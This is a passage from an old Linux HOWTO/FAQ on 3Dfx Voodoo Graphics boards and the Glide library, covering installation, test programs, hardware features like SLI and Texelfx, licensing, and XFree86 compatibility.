/usr/local/glide/include,lib,bin and sets the ld.conf to look there.<br /> Where it installs and setting ld.conf are independent actions. If you<br /> skip the ld.conf step then you need the LD_LIBRARY_PATH.<br /><br /> You will need to install the header files in a location available at<br /> compile time, if you want to compile your own graphics applications.<br /> If you do not want to use the installation as above (i.e. you insist<br /> on a different location), make sure that any application could access<br /> the shared libary at runtime, or you will get a response like can't<br /> load library 'libglide.so'.<br /><br /><br /><br /> 3.3.1. Using the detect program<br /><br /> There is a bin/detect program in the distribution (the source is not<br /> available). You have to run it as root, and you will get something<br /> like<br /><br /> ______________________________________________________________________<br /> slot vendorId devId baseAddr0 command description<br /> ---- -------- ------ ---------- ------- -----------<br /> 00 0x8086 0x122d 0x00000000 0x0006 Intel:430FX (Triton)<br /> 07 0x8086 0x122e 0x00000000 0x0007 Intel:ISA bridge<br /> 09 0x121a 0x0001 0xfb000008 0x0002 3Dfx:video multimedia adapter<br /> 10 0x1000 0x0001 0x0000e401 0x0007 ???:SCSI bus controller<br /> 11 0x9004 0x8178 0x0000e001 0x0017 Adaptec:SCSI bus controller<br /> 12 0x5333 0x88f0 0xf4000000 0x0083 S3:VGA-compatible display co<br /> ______________________________________________________________________<br /><br /><br /> as a result. If you do not have root privileges, the program will bail<br /> out with<br /><br /> ______________________________________________________________________<br /> Permission denied: Failed to change I/O privilege. Are you root?<br /> ______________________________________________________________________<br /><br /><br /> output might come handy for a bug report as well.<br /><br /><br /><br /> 3.3.2. Using the test programs<br /><br /> Within the Glide distribution, you will find a folder with test<br /> programs. Note that these test programs are under 3Dfx copyright, and<br /> are legally available for use only if you have purchased a board with<br /> a 3Dfx chipset. See the LICENSE file in the distribution, or their web<br /> site www.3dfx.com for details.<br /><br /> It is recommend to compile and link the test programs even if there<br /> happen to be binaries in the distribution. Note that some of the<br /> programs will requires some files like alpha.3df from the distribution<br /> to be available in the same folder. All test programs use the 640x480<br /> screen resolution. Some will request a veriety of single character<br /> inputs, others will just state Press A Key To Begin Test. Beware of<br /> loss of input scope if running X11 on the same screen at the same<br /> time.<br /><br /> See the README.test for a list of programs, and other details.<br /><br /><br /><br /> 4. Answers To Frequently Asked Questions<br /><br /> The following section answers some of the questions that (will) have<br /> been asked on the Usenet news groups and mailing lists. The FAQ has<br /> been subdivided into several parts for convenience, namely<br /><br /> o FAQ: Requirements?<br /><br /> o FAQ: Voodoo Graphics (tm)? 3Dfx?<br /><br /> o FAQ: Glide?<br /><br /> o FAQ: Glide and SVGA?<br /><br /> o FAQ: Glide and XFree86?<br /><br /> o FAQ: Glide versus OpenGL/Mesa?<br /><br /> o FAQ: But Quake?<br /><br /> o FAQ: Troubleshooting?<br /><br /> Each section lists several questions and answers, which will<br /> hopefully address most problems.<br /><br /><br /><br /> 5. FAQ: Requirements?<br /><br /><br /><br /> 5.1. What are the system requirements?<br /><br /> A Linux PC, PCI 2.1 compliant, a monitor capable of 640x480, and a 3D<br /> accelerator board based on the 3Dfx Voodoo Graphics (tm). It will work<br /> on a P5 or P6, with or without MMX. The current version does not use<br /> MMX, but it has some optimized code paths for P6.<br /><br /> At one point, some 3Dfx statements seemed to imply that using Linux<br /> Glide required using a RedHat distribution. Note that while Linux<br /> Glide has originally been ported in a RedHat 4.1 environment, it has<br /> been used and tested with many other Linux distributions, including<br /> homebrew, Slackware, and Debian 1.3.1.<br /><br /><br /> 5.2. Does it work with Linux-Alpha?<br /><br /> There is currently no Linux Glide distribution available for any<br /> platform besides i586. As the Glide sources are not available for<br /> distribution, you will have to wait for the binary. Quantum3D has DEC<br /> Alpha support announced for 2H97. Please contact Daryll Strauss if you<br /> are interested in supporting this.<br /><br /> There is also the issue of porting the the assembly modules. While<br /> there are alternative C paths in the code, the assembly module in<br /> Glide (essentially triangle setup) offered significant performance<br /> gains depending on the P5 CPU used.<br /><br /><br /><br /> 5.3. Which 3Dfx chipsets are supported?<br /><br /> Currently, the 3Dfx Voodoo Graphics (tm) chipset is supported under<br /> Linux. The Voodoo Rush (tm) chipset is not yet supported.<br /><br /><br /> 5.4. Is the Voodoo Rush (tm) supported?<br /><br /> The current port of Glide to Linux does not support the Voodoo Rush<br /> (tm). An update is in the works.<br /><br /> The problem is that at one point the Voodoo Rush (tm) driver code in<br /> Glide depended on Direct Draw. There was an SST96 based DOS portion in<br /> the library that could theoretically be used for Linux, as soon as all<br /> portions residing in the 2D/Direct Draw/D3D combo driver are replaced.<br /><br /> Thus Voodoo Rush (tm) based boards like the Hercules Stingray 128/3D<br /> or Intergraph Intense Rush are not supported yet.<br /><br /><br /><br /> 5.5. Which boards are supported?<br /><br /> There are no officially supported boards, as 3Dfx does not sell any<br /> boards. This section does not attempt to list all boards, it will just<br /> give an overview, and will list only boards that have been found to<br /> cause trouble.<br /><br /> It is important to recognize that Linux support for a given board does<br /> not only require a driver for the 3D accelerator component. If a board<br /> features its own VGA core as well, support by either Linux SVGA or<br /> XFree86 is required as well (see section about Voodoo Rush (tm)<br /> chipset). Currently, an add-on solution is recommended, as it allows<br /> you to choose a regular graphics board well supported for Linux. There<br /> are other aspects discussed below.<br /><br /><br /> All Quantum3D Obsidian boards, independend of texture memory, frame<br /> buffer memory, number of Pixelfx and Texelfx units, and SLI should<br /> work. Same for all other Voodoo Graphics (tm) based boards, like<br /> Orchid Righteous 3D, Canopus Pure 3D, Flash 3D, and Diamond Monster<br /> 3D. Voodoo Rush (tm) based boards are not yet supported.<br /><br /> Boards that are not based on 3Dfx chipsets (e.g. manufactured by S3,<br /> Matrox, 3Dlabs, Videologic) do not work with the 3Dfx drivers and are<br /> beyond the scope of this document.<br /><br /><br /><br /> 5.6. How do boards differ?<br /><br /> As the board manufacturers are using the same chipset, any differences<br /> are due to board design. Examples are quality of the pass-through<br /> cable and connectors (reportedly, Orchid provided better quality than<br /> Diamond), availability of a TV-compliant video signal output (Canopus<br /> Pure 3D), and, most notably, memory size on board.<br /><br /> Most common were boards for games with 2MB texture cache and 2 MB<br /> framebuffer memory, however, the Canopus Pure3D comes with a maximal 4<br /> MB texture cache, which is an advantage e.g. with games using<br /> dynamically changed textures, and/or illumation textures (Quake, most<br /> notably). The memory architecture of a typical Voodoo Graphics (tm)<br /> board is described below, in a separate section.<br /><br /> Quantum 3D offers the widest selection of 3Dfx-based boards, and is<br /> probably the place to go if you are looking for a high end Voodoo<br /> Graphics (tm) based board configuration. Quantum 3D is addressing the<br /> visual simulation market, while most of the other vendors are only<br /> targetting the consumer-level PC-game market.<br /><br /><br /><br /> 5.7. What about AGP?<br /><br /> There is no Voodoo Graphics (tm) or Voodoo Rush (tm) AGP board that I<br /> am aware of. I am not aware of AGP support under Linux, and I do not<br /> know whether upcmong AGP boards using 3Dfx technology might possibly<br /> be supported with Linux.<br /><br /><br /><br /> 6. FAQ: Voodoo Graphics (tm)? 3Dfx?<br /><br /> 6.1. Who is 3Dfx?<br /><br /> 3Dfx is a San Jose based manufacturer of 3D graphics accelerator<br /> hardware for arcade games, game consoles, and PC boards. Their<br /> official website is www.3dfx.com. 3Dfx does not sell any boards, but<br /> other companies do, e.g. Quantum3D.<br /><br /><br /><br /> 6.2. Who is Quantum3D?<br /><br /> Quantum3D started as a 3Dfx spin-off, manufacturing high end<br /> accelerator boards based on 3Dfx chip technology for consumer and<br /> business market, and supplying arcade game technology. See their home<br /> page at www.quantum3d.com for additional information. For general<br /> inquiries regarding Quantum3D, please send mail to info@quantum3d.<br /><br /><br /> 6.3. What is the Voodoo Graphics (tm)?<br /><br /> The Voodoo Graphics (tm) is a chipset manufactured by 3Dfx. It is used<br /> in hardware acceleration boards for the PC. See the HOWTO section on<br /> supported hardware.<br /><br /><br /> 6.4. What is the Voodoo Rush (tm)?<br /><br /> The Voodoo Rush (tm) is a derivate of the Voodoo Graphics (tm) that<br /> has an interface to cooperate with a 2D VGA video accelerator,<br /> effectively supporting accelerated graphics in windows. This combo is<br /> currently not supported with Linux.<br /><br /><br /> 6.5. What is the Voodoo 2 (tm)?<br /><br /> The Voodoo 2 (tm) is the successor of the Voodoo Graphics (tm)<br /> chipset, featuring several improvements. It is announced for late<br /> March 1998, and annoucements of Voodoo 2 (tm) based boards have been<br /> published e.g. by Quantum 3D, by Creative Labs, Orchid Technologies,<br /> and Diamond Multimedia.<br /><br /> The Voodoo 2 (tm) is supposed to be backwards compatible. However, a<br /> new version of Glide will have to be ported to Linux.<br /><br /><br /><br /> 6.6. What is VGA pass-though?<br /><br /> The Voodoo Graphics (tm) (but not the Voodoo Rush (tm)) boards are<br /> add-on boards, meant to be used with a regular 2D VGA video<br /> accelerator board. In short, the video output of your regular VGA<br /> board is used as input for the Voodoo Graphics (tm) based add-on<br /> board, which by default passes it through to the display also<br /> connected to the Voodoo Graphics (tm) board. If the Voodoo Graphics<br /> (tm) is used (e.g. by a game), it will disconnect the VGA input<br /> signal, switch the display to a 640x480 fullscreen mode with the<br /> refresh rate configured by SST variables and the application/driver,<br /> and generate the video signal itself. The VGA doesn't need to be aware<br /> of this, and won't be.<br /><br /> This setup has several advantages: free choice of 2D VGA board, which<br /> is an issue with Linux, as XFree86 drivers aren't available for all<br /> chipsets and revisions, and a cost effective migration path to<br /> accelerated 3D graphics. It also has several disadvantages: an<br /> application using the Voodoo Graphics (tm) might not re-enable video<br /> output when crashing, and regular VGA video signal deteoriates in the<br /> the pass-through process.<br /><br /><br /> 6.7. What is Texelfx or TMU?<br /><br /> Voodoo Graphics (tm) chipsets have two units. The first one interfaces<br /> the texture memory on the board, does the texture mapping, and<br /> ultimately generates the input for the second unit that interfaces the<br /> framebuffer. This one is called Texelfx, aka Texture Management Unit,<br /> aka TMU. The neat thing about this is that a board can use two Texelfx<br /> instead of only one, like some of the Quantum3D Obsidian boards did,<br /> effectively doubling the processing power in some cases, depending on<br /> the application.<br /><br /> As each Texelfx can address 4MB texture memory, a dual Texelfx setup<br /> has an effective texture cache of up to 8MB. This can be true even if<br /> only one Texelfx is actually needed by a particular application, as<br /> textures can be distributed to both Texelfx, which are used depending<br /> on the requested texture. Both Texelfx are used together to perform<br /> certain operations as trilinear filtering and illumination<br /> texture/lightmap passes (e.g. in glQuake) in a single pass instead of<br /> the two passes that are required with only one Texelfx. To actually<br /> exploit the theoretically available speedup and cache size increase, a<br /> Glide application has to use both Texelfx properly.<br /><br /> The two Texelfx can not be used separately to each draw a textured<br /> triangle at the same time. A triangle is always drawn using whatever<br /> the current setup is, which can be to use both Texelfx for a single<br /> pass operation combining two textures, or one Texelfx for only a<br /> single texture. Each Texelfx can only access its own memory.<br /><br /><br /><br /> 6.8. What is a Pixelfx unit?<br /><br /> Voodoo Graphics (tm) chipsets have two units. The second one<br /> interfaces the framebuffer and ultimately generates the depth buffer<br /> and pixel color updates. This one is called Pixelfx. The neat thing<br /> here is that two Pixelfx units can cooperate in SLI mode, like with<br /> some of the Quantum3D Obsidian boards, effectively doubling the frame<br /> rate.<br /><br /><br /><br /> 6.9. What is SLI mode?<br /><br /> SLI means "Scanline Interleave". In this mode, two Pixelfx are<br /> connected and render in alternate turns, one handling odd, the other<br /> handling even scanlines of the actual output. Inthis mode, each<br /> Pixelfx stores only half of the image and half of the depth buffer<br /> data in its own local framebuffer, effectively doubling the number of<br /> pixels.<br /><br /> The Pixelfx in question can be on the same board, or on two boards<br /> properly connected. Some Quantum3D Obsidian boards support SLI with<br /> Voodoo Graphics (tm).<br /><br /> As two cards can decode the same PCI addresses and receive the same<br /> data, there is not necessarily additional bus bandwidth required by<br /> SLI. On the other hand, texture data will have to be replicated on<br /> both boards, thus the amount of texture memory effectively stays the<br /> same.<br /><br /><br /><br /> 6.10. Is there a single board SLI setup?<br /><br /> There are now two types of Quantum3D SLI boards. The intial setup<br /> used two boards, two PCI slots, and an interconnect (e.g. the Obsidian<br /> 100-4440). The later revision which performs identically is contained<br /> on one full-length PCI board (e.g. Obsidian 100-4440SB). Thus a<br /> single board SLI solution is possible, and has been done.<br /><br /><br /><br /> 6.11. How much memory? How many buffers?<br /><br /> The most essential difference between different boards using the<br /> Voodoo Graphics (tm) chipset is the amount and organization of memory.<br /> Quantum3D used a three digit scheme to descibe boards. Here is a<br /> slightly modifed one (anticipating Voodoo 2 (tm)). Note that if you<br /> use more than one Texelfx, they need the same amount of texture cache<br /> memory each, and if you combine two Pixelfx, each needs the same<br /> amount of frame buffer memory.<br /> ______________________________________________________________________<br /> "SLI / Pixelfx / Texelfx1 / Texelfx2 "<br /> ______________________________________________________________________<br /><br /><br /> It means that a common 2MB+2MB board would be a 1/2/2/0 solution, with<br /> the minimally required total 4Mb of memory. A Canopus Pure 3D would be<br /> 1/2/4/0, or 6MB. An Obsidian-2220 board with two Texelfx would be<br /> 1/2/2/2, and an Obsidian SLI-2440 board would be 2/2/4/4. A fully<br /> featured dual board solution (2 Pixelfx, each with 2 Texelfx and 4MB<br /> frame buffer, each Texelfx 4 MB texture cache) would be 2/4/4/4, and<br /> the total amount of memory would be SLI*(Pixelfx+Texelfx1+Texelfx2),<br /> or 24 MB.<br /><br /> So there.<br /><br /><br /> 6.12. Does the Voodoo Graphics (tm) do 24 or 32 bit color?<br /><br /> No. The Voodoo Graphics (tm) architecture uses 16bpp internally. This<br /> is true for Voodoo Graphics (tm), Voodoo Rush (tm) and Voodoo 2 (tm)<br /> alike. Quantum3D claims to implement 22-bpp effective color depth with<br /> an enhanced 16-bpp frame buffer, though.<br /><br /><br /> 6.13. Does the Voodoo Graphics (tm) store 24 or 32 bit z-buffer per<br /> pixel?<br /><br /> No. The Voodoo Graphics (tm) architecture uses 16bpp internally for<br /> the depth buffer, too. This again is true for Voodoo Graphics (tm),<br /> Voodoo Rush (tm) and Voodoo 2 (tm) alike. Again, Quantum3D claims that<br /> using the floating point 16-bits per pixel (bpp) depth buffering<br /> provides 22-bpp effective Z-buffer precision.<br /><br /><br /> 6.14. What resolutions does the Voodoo Graphics (tm) support?<br /><br /> The Voodoo Graphics (tm) chipset supports up to 4 MB frame buffer<br /> memory. Presuming double buffering and a depth buffer, a 2MB<br /> framebuffer will support a resolution of 640x480. With 4 MB frame<br /> buffer, 800x600 is possible.<br /><br /> Unfortunately 960x720 is not supported. The Voodoo Graphics (tm)<br /> chipset requires that the amount of memory for a particular resolution<br /> must be such that the vertical and horizontal resolutions must be<br /> evenly divisible by 32. The video refresh controller, though can<br /> output any particular resolution, but the "virtual" size required for<br /> the memory footprint must be in dimensions evenly divisible by 32.<br /> So, 960x720 actually requires 960x736 amount of memory, and<br /> 960x736x2x3 = 4.04MBytes.<br /><br /> However, using two boards with SLI, or a dual Pixelfx SLI board means<br /> that each framebuffer will only have to store half of the image. Thus<br /> 2 times 4 MB in SLI mode are good up to 1024x768, which is the maximum<br /> because of the overall hardware design. You will be able to do<br /> 1024x768 tripled buffered with Z, but you will not be able to do e.g.<br /> 1280x960 with double buffering.<br /><br /> Note that triple buffering (no VSync synchonization required by the<br /> application), stereo buffering (for interfacing LCD shutters) and<br /> other more demanding setups will severely decrease the available<br /> resolution.<br /><br /><br /><br /> 6.15. What texture sizes are supported?<br /><br /> The maximum texture size for the Voodoo Graphics (tm) chipset is<br /> 256x256, and you have to use powers of two. Note that for really small<br /> textures (e.g. 16x16) you are better off merging them into a large<br /> texture, and adjusting your effective texture coordinates<br /> appropriately.<br /><br /><br /> 6.16. Does the Voodoo Graphics (tm) support paletted textures?<br /><br /> The Voodoo Graphics (tm) hardware and Glide support the palette<br /> extension to OpenGL. The most recent version of Mesa does support the<br /> GL_EXT_paletted_texture and GL_EXT_shared_texture_palette extensions.<br /><br /><br /><br /> 6.17. What about overclocking?<br /><br /> If you want to put aside considerations about warranty and<br /> overheating, and want to do overclocking to boost up performance even<br /> further, there is related info out on the web. The basic mechanism is<br /> to use Glide environment variables to adjust the clock.<br /><br /> Note that the actual recommended clock is board dependend. While the<br /> default clock speed is 50 Mhz, the Diamond Monster 3D property sheet<br /> lets you set up a clock of 57 MHz. It all comes down to the design of<br /> a specific board, and which components are used with the Voodoo<br /> Graphics (tm) chipset - most notably access speed of the RAM in<br /> question. If you exceed the limits of your hardware, rendering<br /> artifacts will occur to say the least. Reportedly, 57 MHz usually<br /> works, while 60 MHz or more is already pushing it.<br /><br /> Increasing the clock frequency also means increasing the waste heat<br /> disposed in the chips, in a nonlinear dependency (10% increase in<br /> frequency means a lot larger increase in heating). In consequence, for<br /> permanent overclocking you might want to educate yourself about ways<br /> to add cooling fans to the board in a way that does not affect<br /> warranty. A very recommendable source is the "3Dfx Voodoo Heat Report"<br /> by Eric van Ballegoie, available on the web.<br /><br /><br /><br /> 6.18. Where could I get additional info on Voodoo Graphics (tm)?<br /><br /> There is a FAQ by 3Dfx, which should be available at their web site.<br /> You will find retail information at the following locations:<br /> www.3dfx.com and www.quantum3d.com.<br /><br /> Inofficial sites that have good info are "Voodoo Extreme" at<br /> www.ve3d.com, and "Operation 3Dfx" at www.ve3d.com.<br /><br /><br /><br /> 7. FAQ: Glide? TexUS?<br /><br /> 7.1. What is Glide anyway?<br /><br /> Glide is a proprietary API plus drivers to access 3D graphics<br /> accelerator hardware based on chipsets manufactured by 3Dfx. Glide has<br /> been developed and implemented for DOS, Windows, and Macintosh, and<br /> has been ported to Linux by Daryll Strauss.<br /><br /><br /><br /> 7.2. What is TexUS?<br /><br /> In the distribution is a libtexus.so, which is the 3Dfx Interactive<br /> Texture Utility Software. It is an image processing libary and<br /> utility program for preparing images for use with the 3Dfx Interactive<br /> Glide library. Features of TexUS include file format conversion,<br /> MIPmap creation, and support for 3Dfx Interactive Narrow Channel<br /> Compression textures.<br /><br /> The TexUS utility program texus reads images in several popular<br /> formats (TGA, PPM, RGT), generates MIPmaps, and writes the images as<br /> 3Dfx Interactive textures files (see e.g. alpha.3df, as found in the<br /> distribution) or as an image file for inspection. For details on the<br /> parameters for texus, and the API, see the TexUS documentation.<br /><br /><br /><br /> 7.3. Is Glide freeware?<br /><br /> Nope. Glide is neither GPL'ed nor subject to any other public license.<br /> See LICENSE in the distribution for any details. Effectively, by<br /> downloading and using it, you agree to the End User License Agreement<br /> (EULA) on the 3Dfx web site. Glide is provided as binary only, and you<br /> should neither use nor distribute any files but the ones released to<br /> the public, if you have not signed an NDA. The Glide distribution<br /> including the test program sources are copyrighted by 3Dfx.<br /><br /> The same is true for all the sources in the Glide distribution. In the<br /> words of 3Dfx: These are not public domain, but they can be freely<br /> distributed to owners of 3Dfx products only. No card, No code!<br /><br /><br /> 7.4. Where do I get Glide?<br /><br /> The entire 3Dfx SDK is available for download off their public web-<br /> site located at www.3dfx.com/software/download_glide.html. Anything<br /> else 3Dfx publicly released by 3Dfx is nearby on their website, too.<br /><br /> There is also an FTP site, ftp.3dfx.com. The FTP has a longer timeout,<br /> and some of the larger files have been broken into 3 files (approx.<br /> 3MB each).<br /><br /><br /><br /> 7.5. Is the Glide source available?<br /><br /> Nope. The Glide source is made available only based on a special<br /> agreement and NDA with 3Dfx.<br /><br /><br /> 7.6. Is Linux Glide supported?<br /><br /> Currently, Linux Glide is unsupported. Basically, it is provided under<br /> the same disclaimers as the 3Dfx GL DLL (see below).<br /><br /> However, 3Dfx definitely wants to provide as much support as possible,<br /> and is in the process of setting up some prerequisites. For the time<br /> being, you will have to rely on the 3Dfx newsgroup (see below).<br /><br /> In addition, the Quantum3D web page claims that Linux support (for<br /> Obsidian) is planned for both Intel and AXP architecture systems in<br /> 2H97.<br /><br /><br /><br /> 7.7. Where could I post Glide questions?<br /><br /> There are newsgroups currently available only on the NNTP server<br /> news.3dfx.com run by 3Dfx. This USENET groups are dedicated to 3Dfx<br /> and Glide in general, and will mainly provide assistance for DOS,<br /> Win95, and NT. The current list includes:<br /><br /> ______________________________________________________________________<br /> 3dfx.events<br /> 3dfx.games.glquake<br /> 3dfx.glide<br /> 3dfx.glide.linux<br /> 3dfx.products<br /> 3dfx.test<br /> ______________________________________________________________________<br /><br /><br /> and the 3dfx.oem.products.* group for specific boards, eg.<br /> 3dfx.oem.products.quantum3d.obsidian. Please use<br /> news.3dfx.com/3dfx.glide.linux for all Lnux Glide related questions.<br /><br /> A mailing list dedicated to Linux Glide is in preparation for 1Q98.<br /> Send mail to majordomo@gamers.org, no subject, body of the message<br /> info linux-3dfx to get information about the posting guidelines, the<br /> hypermail archive and how to subscribe to the list or the digest.<br /><br /><br /><br /> 7.8. Where to send bug reports?<br /><br /> Currently, you should rely on the newsgroup (see above), that is<br /> news.3dfx.com/3dfx.glide.linux. There is no official support e-mail<br /> set up yet. For questions not specific to Linux Glide, make sure to<br /> use the other newsgroups.<br /><br /><br /> 7.9. Who is maintaining it?<br /><br /> 3Dfx will appoint an official maintainer soon. Currently, inofficial<br /> maintainer of the Linux Glide port is Daryll Strauss. Please post bug<br /> reports in the newsgroup (above). If you are confident that you found<br /> a bug not previously reported, please mail to Daryll at<br /> daryll@harlot.rb.ca.us<br /><br /><br /> 7.10. How can I contribute to Linux Glide?<br /><br /> You could submit precise bug reports. Providing sample programs to be<br /> included in the distribution is another possibility. A major<br /> contribution would be adding code to the Glide based Mesa Voodoo<br /> driver source. See section on Mesa Voodoo below.<br /><br /><br /><br /> 7.11. Do I have to use Glide?<br /><br /> Yes. As of now, there is no other Voodoo Graphics (tm) driver<br /> available for Linux. At the lowest level, Glide is the only interface<br /> that talks directly to the hardware. However, you can write OpenGL<br /> code without knowing anything about Glide, and use Mesa with the Glide<br /> based Mesa Voodoo driver. It helps to be aware of the involvement of<br /> Glide for recognizing driver limitations and bugs, though.<br /><br /><br /><br /> 7.12. Should I program using the Glide API?<br /><br /> That depends on the application you are heading for. Glide is a<br /> proprietary API that is partly similar to OpenGL or Mesa, partly<br /> contains features only available as EXTensions to some OpenGL<br /> implementations, and partly contains features not available anywhere<br /> but within Glide.<br /><br /> If you want to use the OpenGL API, you will need Mesa (see below).<br /> Mesa, namely the Mesa Voodoo driver, offers an API resembling the well<br /> documented and widely used OpenGL API. However, the Mesa Voodoo driver<br /> is in early alpha, and you will have to accept performance losses and<br /> lack of support for some features.<br /><br /> In summary, the decision is up to you - if you are heading for maximum<br /> performance while accepting potential problems with porting to<br /> non-3Dfx hardware, Glide is not a bad choice. If you care about<br /> maintenance, OpenGL might be the best bet in the long run.<br /><br /><br /><br /> 7.13. What is the Glide current version?<br /><br /> The current version of Linux Glide is 2.4. The next version will<br /> probably be identical to the current version for DOS/Windows, which is<br /> 2.4.3, which comes in two distributions. Right now, various parts of<br /> Glide are different for Voodoo Rush (tm) (VR) and Voodoo Graphics (tm)<br /> (VG) boards. Thus you have to pick up separate distributions (under<br /> Windows) for VR and VG. The same will be true for Linux. There will<br /> possibly be another chunk of code and another distribution for Voodoo<br /> 2 (tm) (V2) boards.<br /><br /> There is also a Glide 3.0 in preparation that will extend the API for<br /> use of triangle fans and triangle strips, and provide better state<br /> change optimization. Support for fans and strips will in some<br /> situations significantly reduce the amount of data sent ber triangle,<br /> and the Mesa driver will benefit from this, as the OpenGL API has<br /> separate modes for this. For a detailed explanation on this see e.g.<br /> the OpenGL documentation.<br /><br /><br /><br /> 7.14. Does it support multiple Texelfx already?<br /><br /> Multiple Texelfx/TMU's can be used for single pass trilinear<br /> mipmapping for improvement image quality without performance penalty<br /> in current Linux Glide already. You will need a board with two Texelfx<br /> (that is, one of the appropriate Quantum3D Obsidian boards). The<br /> application needs to specify the use of both Texelfx accordingly, it<br /> does not happen automatically.<br /><br /> Note that because most applications are implemented for consumer<br /> boards with a single Texelfx, they might not query the presence of a<br /> second Texelfx, and thus not use it. This is not a flaw of Glide but<br /> of the application.<br /><br /><br /><br /> 7.15. Is Linux Glide identical to DOS/Windows Glide?<br /><br /> The publicly available version of Linux Glide should be identical to<br /> the respective DOS/Windows versions. Delays in releasing the Linux<br /> port of newer DOS/Windows releases are possible.<br /><br /><br /> 7.16. Where to I get information on Glide?<br /><br /> There is exhaustive information available from 3Dfx. You could<br /> download it from their home page at<br /> www.3dfx.com/software/download_glide.html. These are for free,<br /> presuming you bought a 3Dfx hardware based board. Please read the<br /> licensing regulations.<br /><br /> Basically, you should look for some of the following:<br /><br /> o Glide Release Notes<br /><br /> o Glide Programming Guide<br /><br /> o Glide Reference Manual<br /><br /> o Glide Porting Guide<br /><br /> o TexUs Texture Utility Software<br /><br /> o ATB Release Notes<br /><br /> o Installing and Using the Obsidian<br /><br /> These are available as Microsoft Word documents, and part of the<br /> Windows Glide distribution, i.e. the self-extracting archive file.<br /> Postscript copies for separate download should be available at<br /> www.3dfx.com as well. Note that the release numbers are not always<br /> in sync with those of Glide.<br /><br /><br /><br /> 7.17. Where to get some Glide demos?<br /><br /> You will find demo sources for Glide within the distribution (test<br /> programs), and on the 3Dfx home page. The problem with the latter is<br /> that some require ATB. To port these demos to Linux, the event<br /> handling has to be completely rewritten.<br /><br /> In addition, you might find useful some of the OpenGL demo sources<br /> accompanying Mesa and GLUT. While the Glide API is different from the<br /> OpenGL API, they target the same hardware rendering pipeline.<br /><br /><br /><br /> 7.18. What is ATB?<br /><br /> Some of the 3Dfx demo programs for Glide depend not only on Glide but<br /> also on 3Dfx's proprietary Arcade Toolbox (ATB), which is available<br /> for DOS and Win32, but has not been ported for Linux. If you are a<br /> devleoper, the sources are available within the Total Immersion<br /> program, so porting ATB to Linux would be possible.<br /><br /><br /><br /> 8. FAQ: Glide and XFree86?<br /><br /><br /> 8.1. Does it run with XFree86?<br /><br /> Basically, the Voodoo Graphics (tm) hardware does not care about X.<br /> The X server will not even notice that the video signal generated by<br /> the VGA hardware does not reach the display in single screen<br /> configurations. If your application is not written X aware, Glide<br /> switching to full screen mode might cause problems (see<br /> troubleshooting section). If you do not want the overhead of writing<br /> an X11-aware application, you might want to use SVGA console mode<br /> instead.<br /><br /> So yes, it does run with XFree86, but no, it is not cooperating if you<br /> don't write your application accordingly. You can use the Mesa "window<br /> hack", which will be significantly slower than fullscreen, but still a<br /> lot faster than software rendering (see section below).<br /><br /><br /><br /> 8.2. Does it only run full screen?<br /><br /> See above. The Voodoo Graphics (tm) hardware is not window environment<br /> aware, neither is Linux Glide. Again, the experimental Mesa "window<br /> hack" covered below will allow for pasting the Voodoo Graphics (tm)<br /> board framebuffer's content into an X11 window.<br /><br /><br /><br /> 8.3. What is the problem with AT3D/Voodoo Rush (tm) boards?<br /><br /> There is an inherent problem when using Voodoo Rush (tm) boards with<br /> Linux: Basically, these boards are meant to be VGA 2D/3D accelerator<br /> boards, either as a single board solution, or with a Voodoo Rush (tm)<br /> based daughterboard used transparently. The VGA component tied to the<br /> Voodoo Rush (tm) is a Alliance Semiconductor's ProMotion-AT3D<br /> multimedia accelerator. To use this e.g. with XFree86 at all, you<br /> need a driver for the AT3D chipset.<br /><br /> There is a mailing list on this, and a web site with FAQ at<br /> www.frozenwave.com/linux-stingray128. Look there for most current<br /> info. There is a SuSE maintained driver at<br /> ftp.suse.com/suse_update/special/xat3d.tgz. Reportedly, the XFree86<br /> SVGA server also works, supporting 8, 16 and 32 bpp. Official support<br /> will probably be in XFree86 4.0. XFree86 decided to prepare an<br /> intermediate XFree86 3.3.2 release as well, which might already<br /> address the issues.<br /><br /> The following XF86Config settings reportedly work.<br /><br /> ______________________________________________________________________<br /> # device section settings<br /> Chipset "AT24"<br /> Videoram 4032<br /><br /> # videomodes tested by Oliver Schaertel<br /> # 25.18 28.32 for 640 x 480 (70hz)<br /> # 61.60 for 1024 x 786 (60hz)<br /> # 120 for 1280 x 1024 (66hz)<br /> ______________________________________________________________________<br /><br /><br /> In summary, there is nothing prohibiting this except for the fact that<br /> the drivers in XFree86 are not yet finished.<br /><br /> If you want a more technical explanation: Voodoo Rush (tm) support<br /> requires X server changes to support grabbing a buffer area in the<br /> video memory on the AT3D board, as the Voodoo Rush (tm) based boards<br /> need to store their back buffer and z buffer there. This memory<br /> allocation and locking requirement is not a 3Dfx specific problem, it<br /> is also needed e.g. for support of TV capture cards, and is thus under<br /> active development for XFree86. This means changes at the device<br /> dependend X level (thus XAA), which are currently implemented as an<br /> extension to XFree86 DGA (Direct Graphics Access, an X11 extension<br /> proposal implemented in different ways by Sun and XFree86, that is not<br /> part of the final X11R6.1 standard and thus not portable). It might be<br /> part of an XFree86 GLX implementation later on. The currently<br /> distributed X servers assume they have full control of the<br /> framebuffer, and use anything that is not used by the visual region of<br /> the framebuffer as pixmap cache, e.g. for caching fonts.<br /><br /><br /><br /> 8.4. What about GLX for XFree86?<br /><br /> There are a couple of problems.<br /><br /> The currently supported Voodoo Graphics (tm) hardware and the<br /> available revision of Linux Glide are full screen only, and not set up<br /> to share a framebuffer with a window environment. Thus GLX or other<br /> integration with X11 is not yet possible.<br /><br /> The Voodoo Rush (tm) might be capable of cooperating with XFree86<br /> (that is, an SVGA compliant board will work with the XFree86 SVGA<br /> server), but it is not yet supported by Linux Glide, nor do S3 or<br /> other XFree86 servers support these boards yet.<br /><br /> In addition, GLX is tied to OpenGL or, in the Linux case, to Mesa.<br /> The XFree86 team is currently working on integrating Mesa with their X<br /> Server. GLX is in beta, XFree86 3.3 has the hooks for GLX. See Steve<br /> Parker's GLX pages at www.cs.utah.edu/~sparker/xfree86-3d/ for the<br /> most recent information. Moreover, there is a joint effort by XFree86<br /> and SuSe, which includes a GLX, see www.suse.de/~sim/. Currently,<br /> Mesa still uses its GLX emulation with Linux.<br /><br /><br /><br /> 8.5. Glide and commerical X Servers?<br /><br /> I have not received any mail regarding use of Glide and/or Mesa with<br /> commercial X Servers. I would be interested to get confirmation on<br /> this, especially on Mesa and Glide with a commercial X Server that has<br /> GLX support.<br /><br /><br /><br /> 8.6. Glide and SVGA?<br /><br /> You should have no problems running Glide based applications either<br /> single or dual screen using VGA modes. It might be a good idea to set<br /> up the 640x480 resolution in the SVGA modes, too, if you are using a<br /> single screen setup.<br /><br /><br /> 8.7. Glide and GGI?<br /><br /> A GGI driver for 